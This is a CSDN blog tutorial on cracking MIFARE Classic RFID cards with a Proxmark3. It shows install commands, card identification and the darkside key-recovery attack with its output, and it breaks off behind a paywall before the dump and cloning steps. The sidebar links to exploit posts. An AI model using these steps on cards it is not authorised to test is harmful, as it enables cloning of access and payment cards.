Exploit - RFID

最新推荐文章于 2021-03-29 13:56:31 发布
最新推荐文章于 2021-03-29 13:56:31 发布
阅读量2k 收藏 1
点赞数
分类专栏: exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/68943414
版权
本文介绍了RFID攻击技术,包括使用Proxmark3进行准备、安装、检查设备状态、破解密钥、数据转储和写入。通过PRNG攻击和嵌套攻击方法,展示了如何在不同卡片上获取和验证密钥。此外,还讨论了特殊类型的Mifare卡片,它们允许对特定区块进行未授权写入,并展示了如何利用Proxmark进行数据修改和卡片克隆。
摘要由CSDN通过智能技术生成

RFID Hacking

  1. Prepare

    • Install Proxmark3
    • Check Proxmark3 / card status

  2. Crack Keys

    • PRNG Attack
    • NESTED Attack
  3. Dump data & Write data

Prepare

Install Proxmark3

$ sudo apt-get install git build-essential libreadline5 libreadline-dev gcc-arm-none-eabi libusb-0.1-4 libusb-dev libqt4-dev ncurses-dev perl pkg-config
$ git clone https://github.com/Proxmark/proxmark3.git
$ cd proxmark3
$ make clean && make

Check Proxmark3 / card status

Show version information about the connected Proxmark.

proxmark3> hw version
[[[ Cached information ]]]

Prox/RFID mark3 RFID instrument

uC: AT91SAM7S256 Rev C
Embedded Processor: ARM7TDMI
Nonvolatile Program Memory Size: 256K bytes. Used: 0 bytes ( 0%). Free: 262144 bytes (100%).
Second Nonvolatile Program Memory Size: None
Internal SRAM Size: 64K bytes
Architecture Identifier: AT91SAM7Sxx Series
Nonvolatile Program Memory Type: Embedded Flash Memory
proxmark3> hw tune

Measuring antenna characteristics, please wait........
# LF antenna: 30.39 V @   125.00 kHz
# LF antenna: 32.45 V @   134.00 kHz
# LF optimal: 37.40 V @   129.03 kHz
# HF antenna: 18.54 V @    13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.

Crack Keys

Act like an ISO14443 Type A reader

proxmark3> hf 14a reader
 UID : f3 34 9b ce
ATQA : 00 04
 SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO

Read parity error messages. The next step is to extract at least one valid sector key (A or B ). The implementation of the darkside attack in this firmware version of the proxmark only takes about 9 seconds to complete. In this case the key that was found is one of the default keys but that does not affect the speed of the attack.

PRNG Attack

proxmark3> hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average
Press button on the proxmark3 device to abort both proxmark3 and client.
-------------------------------------------------------------------------
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
Parity is all zero. Most likely this card sends NACK on every failed authentication.
Attack will take a few seconds longer because we need two consecutive successful runs.
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
.#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can't select card
#db# Mifare: Can'
最低0.47元/天 解锁文章
Nixawk
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
多种非接触卡 ATQA 字节说明
weixin_30852451的博客
03-03 3945
原文地址 13.56 MHz RFID Software An Open Source implementation of an NFC stack, and various related utilities is available from theLibNFCproject. The author of this page has released a nu...
exploit - dahua camera backdoor
Nixawk
03-17 1万+
Just for security assessment. If you can exploit the dahua camera devices, username/password/cookies can be used to access camera video.Exploit CodeI’ll share it later.$ python exploit_dahua.py 192.168
oracle-基本操作
嬉皮笑脸面对人生的难
10-09 200
1.显示当前用户SQL> show user USER is "PCARD" 2.显示当前用户下所有的表SQL>select * from tab; 3.查下某个表的表结构SQL>desc 表名 4.执行上一个语句 SQL>/ 5.查询语句替换列名select card_id 卡号,brh_id 机构号 from t_card_info; 6.查询某列并去重SELECT DISTINC
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
该压缩包"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"可能包含了一个JNDI注入攻击的示例或者测试工具,"SNAPSHOT"通常表示这是一个开发中的版本,可能尚未经过完整测试,因此可能存在漏洞或不稳定性。使用这样的...
linux-exploit-suggester:Linux特权升级审核工具
04-22
LES:Linux特权升级审核工具快速下载: wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh有关LES用法和内部工作方式的详细信息: ...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
12-12
标题"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip"暗示了这是一个关于JNDI注入漏洞的exploit工具包,版本为1.0 SNAPSHOT,可能包含了多个利用示例或攻击代码。"all"可能表示该压缩包包含了所有相关的组件或测试...
getExploit:从exploit-db.com下载漏洞利用程序
05-25
搜索漏洞search命令使您可以在原始exploit-db的CSV文件的任何字段中搜索给定的模式。 搜索查询必须采用field_name:pattern couples的形式,如果未给出字段名称,则默认为description 。 可用字段为: id内部漏洞利用...
RFID卡的破解
热门推荐
red_sky_blue的专栏
12-08 1万+
网上看了很多RFID破解的文章,大部分都是工具使用,一步步该怎么操作,基本上没有讲原理的,估计导致了很多初学者非常迷惑,特别是一旦按照操作步骤操作的时候出错时更加迷惑,不知道是什么状况,国内radiowar也同样没有看到过特别介绍原理性的文章。 建议大家还是多看看外文原版的资料说明,会理解的更透彻些,才能更快的加入到RFID安全研究及测试中。 参考站点: http://www.p
基于ubuntu的proxmark3编译使用
Etual的专栏
06-29 772
官方的指南: https://github.com/Proxmark/proxmark3/wiki/Ubuntu-Linux 我的系统是 ubuntu 18.04 x64 1)安装工具,编译器等 sudo apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none
RFID破解三两事
不断攀登
04-10 5029
网上看了很多RFID破解的文章,大部分都是工具使用,一步步该怎么操作,基本上没有讲原理的,估计导致了很多初学者非常迷惑,特别是一旦按照操作步骤操作的时候出错时更加迷惑,不知道是什么状况,国内radiowar也同样没有看到过特别介绍原理性的文章。 建议大家还是多看看外文原版的资料说明,会理解的更透彻些,才能更快的加入到RFID安全研究及测试中。 参考站点: http://www.p
Authentication failed; nested exception is javax.mail.AuthenticationFailedException: 535 Error: auth
qq_27101653的博客
12-05 7410
最近使用springboot发送邮件时出现了点小问题 分享给大家: 报错信息如下图:   查了些资料,找到了问题所在! 本人使用的是163邮箱发送邮件 所以配置 登陆密码的时候 需要注意: password配置的是163的授权码。 163授权码的配置 可以参照下方链接:https://jingyan.baidu.com/article/adc815139f60c2f723bf738...
LCG(线性同余生成器)
weixin_45883223的博客
03-29 6206
LCG(线性同余生成器) 伪随机数生成器(pseudo random number generator,PRNG) 流密码(stream cipher) LCG属于PRNG和stream cipher的一种。 Principle 递归公式:Sn+1≡aSn+b( mod m) S_{n+1} \equiv aS_{n} + b \left(\bmod m\right) Sn+1​≡aSn​+b(modm) 若 gcd(a,m)=1 gcd\left(a, m\right) = 1 gcd(a,m)=1
Proxmark3笔记(一)
andiao1218的博客
10-17 794
Kali下使用Proxmark3 apt-get update apt-get install build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev perl pkg-config subversion 然后下载Proxmark3的软件包打开到client目录下 root@sch...
SpringBoot 整合Mail发送功能问题与解决
aaronyan1990的博客
01-08 404
SpringBootLean 是对springboot学习与研究项目,是根据实际项目的形式对进行配置与处理,欢迎star与fork。 [oschina 地址] http://git.oschina.net/cmlbeliever/SpringBootLearning [github 地址] https://github.com/cmlbelie...
BSCMAKE: error BK1506 : cannot open file '.\Debug\Client_DM36xDlg.sbr': No such file or directory
cffishappy的专栏
07-26 5695
执行 cl.exe 时出错. Creating browse info file... BSCMAKE: error BK1506 : cannot open file '.\Debug\Client_DM36xDlg.sbr': No such file or directory   解决方法: 将Debug删掉,重新编译,OK!
linux-exploit-suggester2
最新发布
07-28
你好,感谢你的提问!针对 Linux 系统的漏洞利用建议工具有很多,其中一个常用的工具是 Linux-exploit-suggester 2。它是一个能够检测 Linux 系统中已知漏洞的脚本,以帮助系统管理员评估系统安全性并提供潜在的漏洞利用建议。 该工具可以通过分析运行中的 Linux 内核版本和已加载的模块来确定可能存在的漏洞利用。它会与 CVE(通用漏洞和暴露)数据库进行比对,找出可能适用于当前系统的已知漏洞。 要使用 Linux-exploit-suggester 2,你需要将该脚本下载到你的 Linux 系统上,并运行它来获取漏洞利用建议。请注意,这个工具只能检测已知的漏洞,因此及时更新和修补系统是保持系统安全性的重要步骤。 希望这个回答能够帮到你!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值